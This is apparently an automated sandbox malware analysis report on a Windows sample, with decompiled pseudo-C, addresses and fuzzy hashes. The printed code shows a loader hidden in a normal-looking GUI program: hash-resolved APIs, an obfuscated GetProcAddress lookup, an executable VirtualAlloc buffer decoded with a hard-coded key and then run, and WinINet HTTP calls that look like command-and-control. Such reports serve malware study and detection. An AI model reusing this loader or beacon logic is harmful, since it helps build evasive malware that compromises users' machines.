                                                                                                      									} else {
                                                                                                      										_t104 = _t126 + 0x9b;
                                                                                                      										_t115 = _t83;
                                                                                                      										do {
                                                                                                      											_t115 = _t115 + 1;
                                                                                                      											 *((char*)(_t115 - 1)) =  *_t104;
                                                                                                      											_t104 = _t104 - 1;
                                                                                                      											__eflags = _t104 - _t126 + 0x3c;
                                                                                                      										} while (_t104 >= _t126 + 0x3c);
                                                                                                      										_t111 =  *(_t126 + 0x14);
                                                                                                      										_t121 = 0x2268ca03;
                                                                                                      										while(1) {
                                                                                                      											goto L3;
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								if(__eflags == 0) {
                                                                                                      									_t121 = 0xc9d0246;
                                                                                                      									goto L3;
                                                                                                      								} else {
                                                                                                      									__eflags = _t121 - 0x250899ad;
                                                                                                      									if(_t121 == 0x250899ad) {
                                                                                                      										_t75 =  *0x20be14c;
                                                                                                      										__eflags = _t75;
                                                                                                      										if(_t75 == 0) {
                                                                                                      											_t75 = E020B3DD0(_t83, E020B3E70(0x60f9cb2), 0x8e956c76, _t125);
                                                                                                      											 *0x20be14c = _t75;
                                                                                                      										}
                                                                                                      										 *_t75( *((intOrPtr*)(_t126 + 0x18)));
                                                                                                      										_t111 =  *(_t126 + 0x14);
                                                                                                      										_t121 = 0x1e7fd4d2;
                                                                                                      										while(1) {
                                                                                                      											goto L3;
                                                                                                      										}
                                                                                                      									} else {
                                                                                                      										__eflags = _t121 - 0x2572d88b;
                                                                                                      										if(_t121 != 0x2572d88b) {
                                                                                                      											goto L43;
                                                                                                      										} else {
                                                                                                      											_t78 =  *0x20bdcc8;
                                                                                                      											__eflags = _t78;
                                                                                                      											if(_t78 == 0) {
                                                                                                      												_t78 = E020B3DD0(_t83, E020B3E70(0x60f9cb2), 0x91ee8387, _t125);
                                                                                                      												 *0x20bdcc8 = _t78;
                                                                                                      											}
                                                                                                      											_t101 =  *0x20be360; // 0x53b7e8
                                                                                                      											 *_t78( *((intOrPtr*)(_t101 + 0x20)), 0, 0, _t126 + 0x18);
                                                                                                      											_t111 =  *(_t126 + 0x14);
                                                                                                      											asm("sbb esi, esi");
                                                                                                      											_t121 = (_t121 & 0x0082f501) + 0x1e7fd4d2;
                                                                                                      											while(1) {
                                                                                                      												goto L3;
                                                                                                      											}
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      							goto L48;
                                                                                                      							L43:
                                                                                                      							__eflags = _t121 - 0x31f267c0;
                                                                                                      						} while (_t121 != 0x31f267c0);
                                                                                                      						return _t119;
                                                                                                      						goto L48;
                                                                                                      					}
                                                                                                      				}
                                                                                                      			}































                                                                                                      0x020b2247
                                                                                                      0x020b224e
                                                                                                      0x020b2252
                                                                                                      0x020b2254
                                                                                                      0x020b2256
                                                                                                      0x020b225b
                                                                                                      0x020b225b
                                                                                                      0x020b225b
                                                                                                      0x020b225f
                                                                                                      0x020b2263
                                                                                                      0x020b2263
                                                                                                      0x020b2263
                                                                                                      0x020b2263
                                                                                                      0x020b2269
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b226f
                                                                                                      0x020b239b
                                                                                                      0x020b23a0
                                                                                                      0x020b23a8
                                                                                                      0x020b23aa
                                                                                                      0x020b23bd
                                                                                                      0x020b23c2
                                                                                                      0x020b23c2
                                                                                                      0x020b23d8
                                                                                                      0x020b23da
                                                                                                      0x020b23de
                                                                                                      0x020b23e0
                                                                                                      0x020b23e4
                                                                                                      0x020b23ea
                                                                                                      0x020b23ef
                                                                                                      0x00000000
                                                                                                      0x020b23ef
                                                                                                      0x00000000
                                                                                                      0x020b2275
                                                                                                      0x020b2275
                                                                                                      0x020b227b
                                                                                                      0x020b2348
                                                                                                      0x020b234e
                                                                                                      0x00000000
                                                                                                      0x020b2354
                                                                                                      0x020b2354
                                                                                                      0x020b2359
                                                                                                      0x020b235c
                                                                                                      0x020b235f
                                                                                                      0x020b2361
                                                                                                      0x020b2374
                                                                                                      0x020b2379
                                                                                                      0x020b2379
                                                                                                      0x020b2384
                                                                                                      0x020b2386
                                                                                                      0x020b238a
                                                                                                      0x020b238d
                                                                                                      0x020b2391
                                                                                                      0x020b225f
                                                                                                      0x00000000
                                                                                                      0x020b225f
                                                                                                      0x020b225f
                                                                                                      0x020b2281
                                                                                                      0x020b2281
                                                                                                      0x020b255c
                                                                                                      0x020b255e
                                                                                                      0x020b2562
                                                                                                      0x020b2562
                                                                                                      0x00000000
                                                                                                      0x020b2287
                                                                                                      0x020b228d
                                                                                                      0x020b22ff
                                                                                                      0x020b2300
                                                                                                      0x020b2303
                                                                                                      0x020b2308
                                                                                                      0x020b2308
                                                                                                      0x020b2308
                                                                                                      0x020b230e
                                                                                                      0x020b2311
                                                                                                      0x020b2316
                                                                                                      0x020b231a
                                                                                                      0x020b231c
                                                                                                      0x020b231e
                                                                                                      0x020b2320
                                                                                                      0x020b2567
                                                                                                      0x020b2573
                                                                                                      0x020b2326
                                                                                                      0x020b2329
                                                                                                      0x020b232c
                                                                                                      0x020b2330
                                                                                                      0x020b2338
                                                                                                      0x020b233b
                                                                                                      0x020b233f
                                                                                                      0x00000000
                                                                                                      0x020b233f
                                                                                                      0x020b228f
                                                                                                      0x020b2295
                                                                                                      0x00000000
                                                                                                      0x020b229b
                                                                                                      0x020b229b
                                                                                                      0x020b22a3
                                                                                                      0x020b22bb
                                                                                                      0x020b22bd
                                                                                                      0x020b22c1
                                                                                                      0x020b22c1
                                                                                                      0x020b22d1
                                                                                                      0x020b22e1
                                                                                                      0x020b22e3
                                                                                                      0x020b22e9
                                                                                                      0x020b22f1
                                                                                                      0x020b225f
                                                                                                      0x00000000
                                                                                                      0x020b225f
                                                                                                      0x020b225f
                                                                                                      0x020b2295
                                                                                                      0x020b228d
                                                                                                      0x020b2281
                                                                                                      0x020b227b
                                                                                                      0x00000000
                                                                                                      0x020b226f
                                                                                                      0x020b23f9
                                                                                                      0x020b23ff
                                                                                                      0x020b24b2
                                                                                                      0x020b24b8
                                                                                                      0x00000000
                                                                                                      0x020b24be
                                                                                                      0x020b24be
                                                                                                      0x020b24c4
                                                                                                      0x020b24cc
                                                                                                      0x020b24ce
                                                                                                      0x020b24e6
                                                                                                      0x020b24e8
                                                                                                      0x020b24e8
                                                                                                      0x020b24f8
                                                                                                      0x020b2507
                                                                                                      0x020b2509
                                                                                                      0x020b250b
                                                                                                      0x020b2535
                                                                                                      0x020b2539
                                                                                                      0x00000000
                                                                                                      0x020b250d
                                                                                                      0x020b250d
                                                                                                      0x020b2514
                                                                                                      0x020b2516
                                                                                                      0x020b2518
                                                                                                      0x020b251b
                                                                                                      0x020b251e
                                                                                                      0x020b2523
                                                                                                      0x020b2523
                                                                                                      0x020b2527
                                                                                                      0x020b252b
                                                                                                      0x020b225f
                                                                                                      0x00000000
                                                                                                      0x020b225f
                                                                                                      0x020b225f
                                                                                                      0x020b250b
                                                                                                      0x020b2405
                                                                                                      0x020b2405
                                                                                                      0x020b24a8
                                                                                                      0x00000000
                                                                                                      0x020b240b
                                                                                                      0x020b240b
                                                                                                      0x020b2411
                                                                                                      0x020b2470
                                                                                                      0x020b2475
                                                                                                      0x020b2477
                                                                                                      0x020b248a
                                                                                                      0x020b248f
                                                                                                      0x020b248f
                                                                                                      0x020b2498
                                                                                                      0x020b249a
                                                                                                      0x020b249e
                                                                                                      0x020b225f
                                                                                                      0x00000000
                                                                                                      0x020b225f
                                                                                                      0x020b2413
                                                                                                      0x020b2413
                                                                                                      0x020b2419
                                                                                                      0x00000000
                                                                                                      0x020b241f
                                                                                                      0x020b241f
                                                                                                      0x020b2424
                                                                                                      0x020b2426
                                                                                                      0x020b2439
                                                                                                      0x020b243e
                                                                                                      0x020b243e
                                                                                                      0x020b2448
                                                                                                      0x020b2455
                                                                                                      0x020b2457
                                                                                                      0x020b245d
                                                                                                      0x020b2465
                                                                                                      0x020b225f
                                                                                                      0x00000000
                                                                                                      0x020b225f
                                                                                                      0x020b225f
                                                                                                      0x020b2419
                                                                                                      0x020b2411
                                                                                                      0x020b2405
                                                                                                      0x00000000
                                                                                                      0x020b2543
                                                                                                      0x020b2543
                                                                                                      0x020b2543
                                                                                                      0x020b255b
                                                                                                      0x00000000
                                                                                                      0x020b255b
                                                                                                      0x020b225f

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.519085712.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.519123055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_20b0000_networkitemfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: l
                                                                                                      • API String ID: 0-2517025534
                                                                                                      • Opcode ID: ba540d494303a3bc97edb32621f201d325823f1efc99b51d05b937502894ff2c
                                                                                                      • Instruction ID: 51d4385f04b79673a8fb5fe2444ca76b9ae791b3c44ab873e9ca9cb9b84475fb
                                                                                                      • Opcode Fuzzy Hash: ba540d494303a3bc97edb32621f201d325823f1efc99b51d05b937502894ff2c
                                                                                                      • Instruction Fuzzy Hash: 2281C032A043019FCB3ADF24D890BEAB6E2AF94704F14496DED66A7394D734DC059B92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 95%
                                                                                                      			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                      				intOrPtr _t17;
                                                                                                      				void* _t18;
                                                                                                      				void* _t19;
                                                                                                      				intOrPtr _t23;
                                                                                                      				void* _t24;
                                                                                                      				void* _t25;
                                                                                                      				void* _t26;
                                                                                                      				intOrPtr _t28;
                                                                                                      				signed int _t39;
                                                                                                      				void* _t49;
                                                                                                      				signed int _t52;
                                                                                                      				void* _t54;
                                                                                                      				void* _t56;
                                                                                                      
                                                                                                      				_t50 = __edi;
                                                                                                      				_t49 = __edx;
                                                                                                      				E00406001();
                                                                                                      				_push(0x14);
                                                                                                      				_push(0x434230);
                                                                                                      				E00406830(__ebx, __edi, __esi);
                                                                                                      				_t52 = E004063B1() & 0x0000ffff;
                                                                                                      				E00405FB4(2);
                                                                                                      				_t56 =  *0x400000 - 0x5a4d; // 0x5a4d
                                                                                                      				if(_t56 == 0) {
                                                                                                      					_t17 =  *0x40003c; // 0xf8
                                                                                                      					__eflags =  *((intOrPtr*)(_t17 + 0x400000)) - 0x4550;
                                                                                                      					if( *((intOrPtr*)(_t17 + 0x400000)) != 0x4550) {
                                                                                                      						goto L2;
                                                                                                      					} else {
                                                                                                      						__eflags =  *((intOrPtr*)(_t17 + 0x400018)) - 0x10b;
                                                                                                      						if( *((intOrPtr*)(_t17 + 0x400018)) != 0x10b) {
                                                                                                      							goto L2;
                                                                                                      						} else {
                                                                                                      							_t39 = 0;
                                                                                                      							__eflags =  *((intOrPtr*)(_t17 + 0x400074)) - 0xe;
                                                                                                      							if( *((intOrPtr*)(_t17 + 0x400074)) > 0xe) {
                                                                                                      								__eflags =  *(_t17 + 0x4000e8);
                                                                                                      								_t6 =  *(_t17 + 0x4000e8) != 0;
                                                                                                      								__eflags = _t6;
                                                                                                      								_t39 = 0 | _t6;
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      				} else {
                                                                                                      					L2:
                                                                                                      					_t39 = 0;
                                                                                                      				}
                                                                                                      				 *(_t54 - 0x1c) = _t39;
                                                                                                      				_t18 = E0040408A();
                                                                                                      				_t57 = _t18;
                                                                                                      				if(_t18 == 0) {
                                                                                                      					E00402C8C(0x1c);
                                                                                                      				}
                                                                                                      				_t19 = E0040435E(_t39, _t50, _t57);
                                                                                                      				_t58 = _t19;
                                                                                                      				if(_t19 == 0) {
                                                                                                      					_t19 = E00402C8C(0x10);
                                                                                                      				}
                                                                                                      				E0040609D(_t19);
                                                                                                      				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
                                                                                                      				if(E00405991(_t39, _t50, _t52, _t58) < 0) {
                                                                                                      					E00402C8C(0x1b);
                                                                                                      				}
                                                                                                      				 *0x438c14 = GetCommandLineA(); // executed
                                                                                                      				_t23 = E004060DD(_t49); // executed
                                                                                                      				 *0x4369bc = _t23;
                                                                                                      				_t24 = E00405CA4();
                                                                                                      				_t60 = _t24;
                                                                                                      				if(_t24 < 0) {
                                                                                                      					E00403A3B(_t39, _t49, _t50, _t52, _t60, 8);
                                                                                                      				}
                                                                                                      				_t25 = E00405ED3(_t39, _t49, _t50, _t52);
                                                                                                      				_t61 = _t25;
                                                                                                      				if(_t25 < 0) {
                                                                                                      					E00403A3B(_t39, _t49, _t50, _t52, _t61, 9);
                                                                                                      				}
                                                                                                      				_t26 = E00403A75(1);
                                                                                                      				_t62 = _t26;
                                                                                                      				if(_t26 != 0) {
                                                                                                      					E00403A3B(_t39, _t49, _t50, _t52, _t62, _t26);
                                                                                                      				}
                                                                                                      				_t28 = L0040105F(_t62, 0x400000, 0, E004067CA(), _t52); // executed
                                                                                                      				_t53 = _t28;
                                                                                                      				 *((intOrPtr*)(_t54 - 0x24)) = _t28;
                                                                                                      				if(_t39 == 0) {
                                                                                                      					E00403D4A(_t53);
                                                                                                      				}
                                                                                                      				E00403A66();
                                                                                                      				 *(_t54 - 4) = 0xfffffffe;
                                                                                                      				return E00406875(_t53);
                                                                                                      			}
















                                                                                                      0x00402aec
                                                                                                      0x00402aec
                                                                                                      0x00402aec
                                                                                                      0x00402af6
                                                                                                      0x00402af8
                                                                                                      0x00402afd
                                                                                                      0x00402b07
                                                                                                      0x00402b0c
                                                                                                      0x00402b17
                                                                                                      0x00402b1e
                                                                                                      0x00402b24
                                                                                                      0x00402b29
                                                                                                      0x00402b33
                                                                                                      0x00000000
                                                                                                      0x00402b35
                                                                                                      0x00402b3a
                                                                                                      0x00402b41
                                                                                                      0x00000000
                                                                                                      0x00402b43
                                                                                                      0x00402b43
                                                                                                      0x00402b45
                                                                                                      0x00402b4c
                                                                                                      0x00402b4e
                                                                                                      0x00402b54
                                                                                                      0x00402b54
                                                                                                      0x00402b54
                                                                                                      0x00402b54
                                                                                                      0x00402b4c
                                                                                                      0x00402b41
                                                                                                      0x00402b20
                                                                                                      0x00402b20
                                                                                                      0x00402b20
                                                                                                      0x00402b20
                                                                                                      0x00402b57
                                                                                                      0x00402b5a
                                                                                                      0x00402b5f
                                                                                                      0x00402b61
                                                                                                      0x00402b65
                                                                                                      0x00402b6a
                                                                                                      0x00402b6b
                                                                                                      0x00402b70
                                                                                                      0x00402b72
                                                                                                      0x00402b76
                                                                                                      0x00402b7b
                                                                                                      0x00402b7c
                                                                                                      0x00402b81
                                                                                                      0x00402b8c
                                                                                                      0x00402b90
                                                                                                      0x00402b95
                                                                                                      0x00402b9c
                                                                                                      0x00402ba1
                                                                                                      0x00402ba6
                                                                                                      0x00402bab
                                                                                                      0x00402bb0
                                                                                                      0x00402bb2
                                                                                                      0x00402bb6
                                                                                                      0x00402bbb
                                                                                                      0x00402bbc
                                                                                                      0x00402bc1
                                                                                                      0x00402bc3
                                                                                                      0x00402bc7
                                                                                                      0x00402bcc
                                                                                                      0x00402bcf
                                                                                                      0x00402bd5
                                                                                                      0x00402bd7
                                                                                                      0x00402bda
                                                                                                      0x00402bdf
                                                                                                      0x00402bee
                                                                                                      0x00402bf3
                                                                                                      0x00402bf5
                                                                                                      0x00402bfa
                                                                                                      0x00402bfd
                                                                                                      0x00402bfd
                                                                                                      0x00402c02
                                                                                                      0x00402c37
                                                                                                      0x00402c45

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __amsg_exit_fast_error_exit$___crt$CommandEnvironmentInfoInitializeLineModeShowStartupStringsWindow___security_init_cookie__cinit__ioinit__setargv__setenvp__wincmdln
                                                                                                      • String ID: .$
                                                                                                      • API String ID: 722230336-2223841709
                                                                                                      • Opcode ID: 2b8f61f1431ea0df09f1c0164b502e9dea853c94572a4a06b0668eda39d2d80c
                                                                                                      • Instruction ID: 7ae2d3f055974e6946f000923a398beb9b46f46489c73d20005b371b7e894a64
                                                                                                      • Opcode Fuzzy Hash: 2b8f61f1431ea0df09f1c0164b502e9dea853c94572a4a06b0668eda39d2d80c
                                                                                                      • Instruction Fuzzy Hash: E621D6606043119AFA20BFB29A4BB2F26645F0071DF10447FF905BA1C3DEFC9A408A6D
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 83%
                                                                                                      			E00402000(void* __eflags, struct HACCEL__* _a4, intOrPtr _a16) {
                                                                                                      				long _v8;
                                                                                                      				intOrPtr _v12;
                                                                                                      				struct tagMSG _v40;
                                                                                                      				void* _t17;
                                                                                                      				intOrPtr _t19;
                                                                                                      				void* _t25;
                                                                                                      				int _t28;
                                                                                                      				int _t31;
                                                                                                      				int _t33;
                                                                                                      				void* _t38;
                                                                                                      				void* _t40;
                                                                                                      				long _t43;
                                                                                                      				intOrPtr* _t44;
                                                                                                      				struct HINSTANCE__* _t45;
                                                                                                      				void* _t47;
                                                                                                      				void* _t50;
                                                                                                      				void* _t51;
                                                                                                      
                                                                                                      				_t47 = 0;
                                                                                                      				_t44 = 0;
                                                                                                      				_v8 = 0;
                                                                                                      				_t17 = L00401078(__eflags); // executed
                                                                                                      				if(_t17 == 0) {
                                                                                                      					_t40 = L0040100A(L"kernel32.dll");
                                                                                                      					_t50 = _t50 + 4;
                                                                                                      					if(_t40 != 0) {
                                                                                                      						_t44 = GetProcAddress(0x400000, "lhxXfY9mIrDZ");
                                                                                                      					}
                                                                                                      				}
                                                                                                      				_t19 = L00401014(0xeca, 0x8e9, 0x409,  &_v8);
                                                                                                      				_t51 = _t50 + 0x10;
                                                                                                      				_v12 = _t19;
                                                                                                      				if(_t19 != 0) {
                                                                                                      					_t43 = _v8;
                                                                                                      					_t38 = VirtualAlloc(0, _t43, 0x3000, 0x40); // executed
                                                                                                      					_t47 = _t38;
                                                                                                      					if(_t47 != 0) {
                                                                                                      						 *_t44(_v12, _t43, "*Z59Drrf54QiC$hJ#gOK+69cn8+(xcALhQV>DQd@", 0x29, _t47); // executed
                                                                                                      						_t51 = _t51 + 0x14;
                                                                                                      					}
                                                                                                      				}
                                                                                                      				 *_t47();
                                                                                                      				_t45 = _a4;
                                                                                                      				LoadStringA(_t45, 0x67, 0x436848, 0x64);
                                                                                                      				LoadStringA(_t45, 0x6d, 0x4368b0, 0x64);
                                                                                                      				LoadStringA(_t45, 0x6e, 0x436918, 0x64);
                                                                                                      				L0040107D(_t45);
                                                                                                      				_push(_a16);
                                                                                                      				_t25 = L0040101E(_t45);
                                                                                                      				if(_t25 != 0) {
                                                                                                      					_a4 = LoadAcceleratorsA(_t45, 0x6d);
                                                                                                      					_t28 = GetMessageA( &_v40, 0, 0, 0);
                                                                                                      					__eflags = _t28;
                                                                                                      					if(_t28 != 0) {
                                                                                                      						do {
                                                                                                      							_t31 = TranslateAcceleratorA(_v40, _a4,  &_v40);
                                                                                                      							__eflags = _t31;
                                                                                                      							if(_t31 == 0) {
                                                                                                      								TranslateMessage( &_v40);
                                                                                                      								DispatchMessageA( &_v40);
                                                                                                      							}
                                                                                                      							_t33 = GetMessageA( &_v40, 0, 0, 0);
                                                                                                      							__eflags = _t33;
                                                                                                      						} while (_t33 != 0);
                                                                                                      					}
                                                                                                      					return _v40.wParam;
                                                                                                      				} else {
                                                                                                      					return _t25;
                                                                                                      				}
                                                                                                      			}




















                                                                                                      0x00402009
                                                                                                      0x0040200b
                                                                                                      0x0040200d
                                                                                                      0x00402010
                                                                                                      0x00402017
                                                                                                      0x0040201e
                                                                                                      0x00402023
                                                                                                      0x00402028
                                                                                                      0x0040203a
                                                                                                      0x0040203a
                                                                                                      0x00402028
                                                                                                      0x0040204f
                                                                                                      0x00402054
                                                                                                      0x00402057
                                                                                                      0x0040205c
                                                                                                      0x0040205e
                                                                                                      0x0040206b
                                                                                                      0x00402071
                                                                                                      0x00402075
                                                                                                      0x00402083
                                                                                                      0x00402085
                                                                                                      0x00402085
                                                                                                      0x00402075
                                                                                                      0x00402088
                                                                                                      0x0040208a
                                                                                                      0x0040209d
                                                                                                      0x004020a9
                                                                                                      0x004020b5
                                                                                                      0x004020b8
                                                                                                      0x004020bd
                                                                                                      0x004020c1
                                                                                                      0x004020cb
                                                                                                      0x004020e9
                                                                                                      0x004020f2
                                                                                                      0x004020f4
                                                                                                      0x004020f6
                                                                                                      0x00402104
                                                                                                      0x0040210e
                                                                                                      0x00402114
                                                                                                      0x00402116
                                                                                                      0x0040211c
                                                                                                      0x00402122
                                                                                                      0x00402122
                                                                                                      0x0040212e
                                                                                                      0x00402130
                                                                                                      0x00402130
                                                                                                      0x00402104
                                                                                                      0x0040213d
                                                                                                      0x004020d3
                                                                                                      0x004020d3
                                                                                                      0x004020d3

                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(00400000,lhxXfY9mIrDZ), ref: 00402034
                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0040206B
                                                                                                      • LoadStringA.USER32 ref: 0040209D
                                                                                                      • LoadStringA.USER32 ref: 004020A9
                                                                                                      • LoadStringA.USER32 ref: 004020B5
                                                                                                      • LoadAcceleratorsA.USER32 ref: 004020D9
                                                                                                      • GetMessageA.USER32 ref: 004020F2
                                                                                                      • TranslateAcceleratorA.USER32(?,?,?), ref: 0040210E
                                                                                                      • TranslateMessage.USER32(?), ref: 0040211C
                                                                                                      • DispatchMessageA.USER32 ref: 00402122
                                                                                                      • GetMessageA.USER32 ref: 0040212E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LoadMessage$String$Translate$AcceleratorAcceleratorsAddressAllocDispatchProcVirtual
                                                                                                      • String ID: *Z59Drrf54QiC$hJ#gOK+69cn8+(xcALhQV>DQd@$kernel32.dll$lhxXfY9mIrDZ
                                                                                                      • API String ID: 2593799514-3632223656
                                                                                                      • Opcode ID: 02997f93728868d16abe2a17e01b56cc79349e2df2566ec91700d16330bbe572
                                                                                                      • Instruction ID: 1e1217798d64c8bc9b67b94558be025fea950ab5572aa08b8cde754a73d97501
                                                                                                      • Opcode Fuzzy Hash: 02997f93728868d16abe2a17e01b56cc79349e2df2566ec91700d16330bbe572
                                                                                                      • Instruction Fuzzy Hash: 1031B672B4030976EB20ABA19D46FAF7A6C9B08B54F100077FF04B61D1D6F9ED1187A9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 180 20b2ba0-20b2bd6 181 20b2bda-20b2bde 180->181 182 20b2be0-20b2be6 181->182 183 20b2bec 182->183 184 20b2de2-20b2de8 182->184 185 20b2dd8-20b2ddd 183->185 186 20b2bf2-20b2bf8 183->186 187 20b2dee 184->187 188 20b2ef1-20b2ef7 184->188 185->182 189 20b2ce8-20b2cee 186->189 190 20b2bfe 186->190 193 20b2e9b-20b2ea2 187->193 194 20b2df4-20b2dfa 187->194 191 20b2ef9-20b2eff 188->191 192 20b2f36-20b2f38 188->192 195 20b2d2d-20b2d34 189->195 196 20b2cf0-20b2cf6 189->196 197 20b2c88-20b2c97 190->197 198 20b2c04-20b2c0a 190->198 199 20b2dc7-20b2dcd 191->199 200 20b2f05-20b2f0c 191->200 205 20b2f3a-20b2f40 192->205 206 20b2f42-20b2f44 192->206 203 20b2ebf-20b2eec InternetConnectW 193->203 204 20b2ea4-20b2eba call 20b3e70 call 20b3dd0 193->204 201 20b2dfc-20b2e02 194->201 202 20b2e74-20b2e8d call 20b2930 194->202 219 20b2d51-20b2d79 InternetOpenW 195->219 220 20b2d36-20b2d4c call 20b3e70 call 20b3dd0 195->220 196->199 210 20b2cfc-20b2d03 196->210 215 20b2c99-20b2caf call 20b3e70 call 20b3dd0 197->215 216 20b2cb4-20b2cca 197->216 211 20b2f8c-20b2f93 198->211 212 20b2c10-20b2c16 198->212 208 20b2dd3 199->208 209 20b2fb6-20b2fc1 199->209 213 20b2f29-20b2f31 200->213 214 20b2f0e-20b2f24 call 20b3e70 call 20b3dd0 200->214 201->199 217 20b2e04-20b2e06 201->217 242 20b2e91-20b2e96 202->242 203->182 204->203 207 20b2f46-20b2f4d 205->207 206->207 222 20b2f6a-20b2f87 HttpSendRequestW 207->222 223 20b2f4f-20b2f65 call 20b3e70 call 20b3dd0 207->223 208->181 231 20b2d20-20b2d28 InternetCloseHandle 210->231 232 20b2d05-20b2d1b call 20b3e70 call 20b3dd0 210->232 226 20b2fb0 211->226 227 20b2f95-20b2fab call 20b3e70 call 20b3dd0 211->227 212->199 233 20b2c1c-20b2c32 call 20b4220 212->233 213->182 214->213 215->216 216->242 257 20b2cd0-20b2cd8 216->257 235 20b2e1a 217->235 236 20b2e08-20b2e18 call 20b3460 217->236 224 20b2d7b-20b2d91 call 20b3e70 call 20b3dd0 219->224 225 20b2d96-20b2da1 219->225 220->219 222->181 223->222 224->225 269 20b2dbe-20b2dc4 225->269 270 20b2da3-20b2db9 call 20b3e70 call 20b3dd0 225->270 226->209 227->226 231->182 232->231 275 20b2c7e-20b2c83 233->275 276 20b2c34-20b2c3b 233->276 249 20b2e1e-20b2e25 235->249 236->249 242->182 263 20b2e42-20b2e6f call 20b3400 249->263 264 20b2e27-20b2e3d call 20b3e70 call 20b3dd0 249->264 257->242 273 20b2cde-20b2ce3 257->273 263->182 264->263 269->199 270->269 273->182 275->182 286 20b2c58-20b2c64 ObtainUserAgentString 276->286 287 20b2c3d-20b2c53 call 20b3e70 call 20b3dd0 276->287 289 20b2c77-20b2c79 call 20b4180 286->289 290 20b2c66-20b2c73 call 20b5620 286->290 287->286 289->275 290->289
                                                                                                      C-Code - Quality: 76%
                                                                                                      			E020B2BA0(WCHAR* __ecx, short __edx, long _a4, WCHAR* _a8, void* _a12, intOrPtr _a16) {
                                                                                                      				WCHAR* _v4;
                                                                                                      				short _v8;
                                                                                                      				char _v12;
                                                                                                      				char _v16;
                                                                                                      				WCHAR* _v20;
                                                                                                      				WCHAR* _v24;
                                                                                                      				void* _v28;
                                                                                                      				void* _v32;
                                                                                                      				WCHAR* _v36;
                                                                                                      				void* _v40;
                                                                                                      				void* _v48;
                                                                                                      				intOrPtr _v56;
                                                                                                      				void* _v64;
                                                                                                      				void* __ebx;
                                                                                                      				void* __ebp;
                                                                                                      				signed int _t36;
                                                                                                      				void* _t39;
                                                                                                      				void* _t41;
                                                                                                      				void* _t43;
                                                                                                      				void* _t45;
                                                                                                      				void* _t49;
                                                                                                      				void* _t50;
                                                                                                      				void* _t51;
                                                                                                      				void* _t56;
                                                                                                      				void* _t60;
                                                                                                      				intOrPtr* _t68;
                                                                                                      				void* _t69;
                                                                                                      				void* _t71;
                                                                                                      				void* _t83;
                                                                                                      				void* _t131;
                                                                                                      				void* _t132;
                                                                                                      				void* _t133;
                                                                                                      				void* _t134;
                                                                                                      				long _t135;
                                                                                                      				WCHAR* _t140;
                                                                                                      				void* _t143;
                                                                                                      				void* _t144;
                                                                                                      				void* _t145;
                                                                                                      				void* _t148;
                                                                                                      				void* _t149;
                                                                                                      
                                                                                                      				_t145 =  &_v40;
                                                                                                      				_t144 = _a12;
                                                                                                      				_v4 = __ecx;
                                                                                                      				_t134 = 0x25b8da46;
                                                                                                      				_t83 = _v4;
                                                                                                      				_v8 = __edx;
                                                                                                      				_v36 = 0;
                                                                                                      				_v24 = 0;
                                                                                                      				_v20 = 0;
                                                                                                      				_v40 = 0;
                                                                                                      				while(1) {
                                                                                                      					L1:
                                                                                                      					_t131 = _v32;
                                                                                                      					while(1) {
                                                                                                      						L2:
                                                                                                      						_t148 = _t134 - 0x25b8da46;
                                                                                                      						if(_t148 > 0) {
                                                                                                      							goto L35;
                                                                                                      						}
                                                                                                      						L3:
                                                                                                      						if(_t148 == 0) {
                                                                                                      							_t134 = 0x119a0a0d;
                                                                                                      							continue;
